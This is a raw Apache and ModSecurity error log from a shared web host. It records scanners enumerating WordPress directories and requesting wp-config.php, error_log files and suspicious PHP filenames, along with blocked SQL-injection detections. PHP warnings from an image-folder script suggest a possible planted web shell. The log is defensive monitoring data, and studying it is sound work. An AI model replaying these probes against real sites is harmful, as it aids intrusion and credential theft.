[Tue May 12 03:30:37.468667 2026] [security2:error] [pid 1730175:tid 1730181] [client 129.226.146.134:34054] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKCvXo6NvB9WXx5V-6FtQAAAQQ"]
[Tue May 12 03:30:42.485450 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:30:43.403278 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/Text/Diff/Engine/
[Tue May 12 03:30:48.744883 2026] [:error] [pid 1707624:tid 1707682] [client 193.24.211.103:9697] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 03:30:49.085385 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/pattern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:30:49.965998 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/pattern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/pattern/
[Tue May 12 03:30:53.253054 2026] [security2:error] [pid 1709071:tid 1709093] [client 194.53.140.106:39667] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKCzbvMumyrWMfSu7q1dwAAAMY"], referer: https://www.piregwan-genesis.com/
[Tue May 12 03:30:55.610063 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/table/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:30:56.496066 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/table/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/table/
[Tue May 12 03:31:02.389516 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/js/dist
[Tue May 12 03:31:03.279139 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/js/dist/
[Tue May 12 03:31:15.664765 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:31:16.618811 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/js/tinymce/skins/lightgray/fonts/
[Tue May 12 03:31:18.296963 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/sodium_compat/namespaced/Core/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:31:19.300873 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/sodium_compat/namespaced/Core/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/sodium_compat/namespaced/Core/
[Tue May 12 03:31:25.212389 2026] [proxy_fcgi:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:31:28.141284 2026] [authz_core:error] [pid 1730175:tid 1730187] [client 216.73.216.110:1723] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/coursecopy/error_log
[Tue May 12 03:31:28.934983 2026] [security2:error] [pid 1730207:tid 1730209] [client 172.104.186.23:48476] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp"] [unique_id "agKC8Due9Sp-pIv_Bb6c0wAAAUA"]
[Tue May 12 03:31:28.935195 2026] [security2:error] [pid 1730207:tid 1730209] [client 172.104.186.23:48476] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp"] [unique_id "agKC8Due9Sp-pIv_Bb6c0wAAAUA"]
[Tue May 12 03:31:29.515651 2026] [security2:error] [pid 1730207:tid 1730209] [client 172.104.186.23:48476] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKC8Due9Sp-pIv_Bb6c0wAAAUA"]
[Tue May 12 03:31:32.030105 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:31:32.929338 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/images/smilies/
[Tue May 12 03:31:34.219910 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/themes/twentytwentyone/assets/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:31:35.124627 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/themes/twentytwentyone/assets/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-content/themes/twentytwentyone/assets/
[Tue May 12 03:31:36.965322 2026] [authz_core:error] [pid 1709071:tid 1709088] [client 185.217.125.16:64393] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Tue May 12 03:31:42.963842 2026] [authz_core:error] [pid 1695975:tid 1695997] [client 185.217.125.16:49169] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Tue May 12 03:31:43.229950 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:31:44.194690 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/SimplePie/
[Tue May 12 03:31:49.884944 2026] [authz_core:error] [pid 1691274:tid 1691284] [client 185.217.125.16:51568] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/widgets/error_log, referer: binance.com
[Tue May 12 03:31:56.615331 2026] [authz_core:error] [pid 1691274:tid 1691286] [client 185.217.125.16:58736] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/widgets/error_log, referer: binance.com
[Tue May 12 03:32:25.698112 2026] [proxy_fcgi:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:32:25.857585 2026] [access_compat:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01797: client denied by server configuration: /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/wc-logs/system_core.php
[Tue May 12 03:32:26.793258 2026] [access_compat:error] [pid 1707624:tid 1707699] [client 85.203.21.92:51691] AH01797: client denied by server configuration: /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/wc-logs/system_core.php, referer: http://dev.tct-telecom.fr/wp-content/uploads/wc-logs/system_core.php
[Tue May 12 03:32:28.244866 2026] [access_compat:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01797: client denied by server configuration: /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/woocommerce_uploads/system_core.php
[Tue May 12 03:32:29.187895 2026] [access_compat:error] [pid 1707624:tid 1707699] [client 85.203.21.92:51691] AH01797: client denied by server configuration: /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/woocommerce_uploads/system_core.php, referer: http://dev.tct-telecom.fr/wp-content/uploads/woocommerce_uploads/system_core.php
[Tue May 12 03:32:34.901967 2026] [proxy_fcgi:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:32:46.404131 2026] [proxy_fcgi:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:32:46.562958 2026] [proxy_fcgi:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:32:46.720526 2026] [proxy_fcgi:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:32:46.898551 2026] [proxy_fcgi:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:32:47.057144 2026] [proxy_fcgi:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01071: Got error 'Primary script unknown'
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174158/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174158/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174158/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174158/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174158/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174158/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:33:05.747625 2026] [access_compat:error] [pid 1730175:tid 1730199] [client 85.203.21.153:61043] AH01797: client denied by server configuration: /home/tcttelec/dev.tct-telecom.fr/wp-content/wp-config.php
[Tue May 12 03:33:06.552058 2026] [security2:error] [pid 1730175:tid 1730188] [client 43.133.60.72:50624] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "naturedetres.fr"] [uri "/"] [unique_id "agKDUno6NvB9WXx5V-6G4AAAAQs"]
[Tue May 12 03:33:06.646375 2026] [access_compat:error] [pid 1707624:tid 1707699] [client 85.203.21.92:51691] AH01797: client denied by server configuration: /home/tcttelec/dev.tct-telecom.fr/wp-content/wp-config.php, referer: http://dev.tct-telecom.fr/wp-content/wp-config.php
[Tue May 12 03:33:13.785263 2026] [security2:error] [pid 1707624:tid 1707689] [client 172.104.186.23:59892] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/blog"] [unique_id "agKDWbOxS7i6i_mT2NLVBAAAAEc"]
[Tue May 12 03:33:13.785493 2026] [security2:error] [pid 1707624:tid 1707689] [client 172.104.186.23:59892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/blog"] [unique_id "agKDWbOxS7i6i_mT2NLVBAAAAEc"]
[Tue May 12 03:33:14.986482 2026] [security2:error] [pid 1707624:tid 1707689] [client 172.104.186.23:59892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDWbOxS7i6i_mT2NLVBAAAAEc"]
[Tue May 12 03:33:19.551820 2026] [security2:error] [pid 1707624:tid 1707689] [client 172.104.186.23:59892] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/test"] [unique_id "agKDX7OxS7i6i_mT2NLVCQAAAEc"]
[Tue May 12 03:33:19.552026 2026] [security2:error] [pid 1707624:tid 1707689] [client 172.104.186.23:59892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/test"] [unique_id "agKDX7OxS7i6i_mT2NLVCQAAAEc"]
[Tue May 12 03:33:20.137596 2026] [security2:error] [pid 1707624:tid 1707689] [client 172.104.186.23:59892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDX7OxS7i6i_mT2NLVCQAAAEc"]
[Tue May 12 03:33:22.002407 2026] [security2:error] [pid 1707624:tid 1707689] [client 172.104.186.23:59892] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/site"] [unique_id "agKDYrOxS7i6i_mT2NLVDAAAAEc"]
[Tue May 12 03:33:22.002622 2026] [security2:error] [pid 1707624:tid 1707689] [client 172.104.186.23:59892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/site"] [unique_id "agKDYrOxS7i6i_mT2NLVDAAAAEc"]
[Tue May 12 03:33:22.629365 2026] [security2:error] [pid 1707624:tid 1707689] [client 172.104.186.23:59892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDYrOxS7i6i_mT2NLVDAAAAEc"]
[Tue May 12 03:33:42.121255 2026] [security2:error] [pid 1730175:tid 1730196] [client 66.249.75.4:47484] ModSecurity: Rule 55e8bc6498c0 [id "931120"][file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"][line "40"] - Execution error - PCRE limits exceeded (-47): (null). [hostname "piregwan-genesis.com"] [uri "/piregwan.com/liens/redirect.php"] [unique_id "agKDdno6NvB9WXx5V-6HBQAAARM"]
[Tue May 12 03:33:44.099040 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/cms"] [unique_id "agKDeDue9Sp-pIv_Bb6dLAAAAUo"]
[Tue May 12 03:33:44.099253 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/cms"] [unique_id "agKDeDue9Sp-pIv_Bb6dLAAAAUo"]
[Tue May 12 03:33:44.723016 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDeDue9Sp-pIv_Bb6dLAAAAUo"]
